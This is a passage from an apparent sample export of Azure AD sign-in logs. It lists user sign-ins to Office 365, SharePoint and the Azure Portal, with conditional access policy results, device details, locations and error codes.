-78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,581df607-a3b5-4d26-ad1e-df5222e51c00,SigninLogs,Sucess,36.6404686,-78.26995087
+495,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,13:13.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,50140,None,This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.,0,49aa38bd-08fe-402e-a0f0-3ad25a1c4dd9,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft Cloud App Security,05a65629-4c1b-48c1-a78b-804c4abdd4af,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 18:13,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",0a70c0cd-a111-442a-87bb-4de8e3a11e00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],"{'errorCode': 50140, 'failureReason': ""This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.""}",Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,0a70c0cd-a111-442a-87bb-4de8e3a11e00,SigninLogs,Failed,33.7984581,-84.38828278
+496,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,08:13.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,d500250d-b3b4-4a6e-b372-2e6f71005347,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",success,09/04/2020 18:08,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",c27bb27f-6b5f-4aa7-85e4-b0d879651c00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,c27bb27f-6b5f-4aa7-85e4-b0d879651c00,SigninLogs,Sucess,33.7984581,-84.38828278
+497,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,08:17.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,8ecb4ce6-c9bb-4733-93d9-f57dd5146677,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 18:08,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",c27bb27f-6b5f-4aa7-85e4-b0d8f2651c00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,c27bb27f-6b5f-4aa7-85e4-b0d8f2651c00,SigninLogs,Sucess,33.7984581,-84.38828278
+498,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:33.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,436a19a5-f081-475a-b681-5d0732c96e25,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 18:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",19d407b5-d6ca-4d06-b044-cfca0f411e00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,19d407b5-d6ca-4d06-b044-cfca0f411e00,SigninLogs,Sucess,36.6404686,-78.26995087
+499,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,25:42.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,b0fb1d87-b695-487e-bbc5-f8685d3e823c,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 16:25,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",62115b57-0cb2-458e-8ba0-179e964c1800,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,OfficeClientService,62115b57-0cb2-458e-8ba0-179e964c1800,SigninLogs,Sucess,33.7984581,-84.38828278
+500,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,32:12.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,cbe2ca82-512e-4c05-941a-b0e92a49a57b,Microsoft.aadiam,Microsoft.aadiam,,Chris Boehm,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 16:32,"{'operatingSystem': 'Windows 10', 'deviceId': 'd6dd34c4-e1a4-4486-bd7b-115b5de752fb', 'browser': 'Edge 83.0.478', 'displayName': 'CALMENTROPY', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",6eb2581b-f286-4d3b-a555-c30b37047300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -80.93171691894531, 'latitude': 35.012969970703125}, 'state': 'South Carolina', 'city': 'Fort Mill'}",none,none,none,none,[],{'errorCode': 0},Chris Boehm,8c102503-0f98-4b9b-9b4a-ebb56d14c66a,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,6eb2581b-f286-4d3b-a555-c30b37047300,SigninLogs,Sucess,35.01296997,-80.93171692
+501,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,08:15.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5d4b1262-51fd-4063-ad3a-cf5edb0b5e41,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 18:08,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",d3b25eb5-284d-4091-85e8-2c1154021d00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,d3b25eb5-284d-4091-85e8-2c1154021d00,SigninLogs,Sucess,33.7984581,-84.38828278
+502,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:01.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,c771ca39-07ac-4ee5-8316-480ede22a678,Microsoft.aadiam,Microsoft.aadiam,,Nicholas DiCola (SECURITY JEDI),4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 